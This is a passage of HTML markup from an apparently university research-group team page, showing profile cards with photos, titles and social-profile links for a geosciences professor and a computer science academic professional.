100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c64-outer\">\n            <div data-colibri-id=\"182-c64\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c64 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c65\" class=\"d-block style-973 style-local-182-c65 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Faris-e1697216253732.jpg\" class=\"wp-image-1814 style-973-image style-local-182-c65-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c65-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-974 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Faris Hawamdeh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-975 style-local-182-c67 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Academic Professional\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c68\" class=\"h-text h-text-component style-976 style-local-182-c68 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c69\" class=\"style-977 style-local-182-c69 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/faris-hawamdeh/?trk=public_profile_publication_contributor-image\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/faris-hawamdeh/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Faris-Hawamdeh\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c73\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c73 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c146\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c146 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 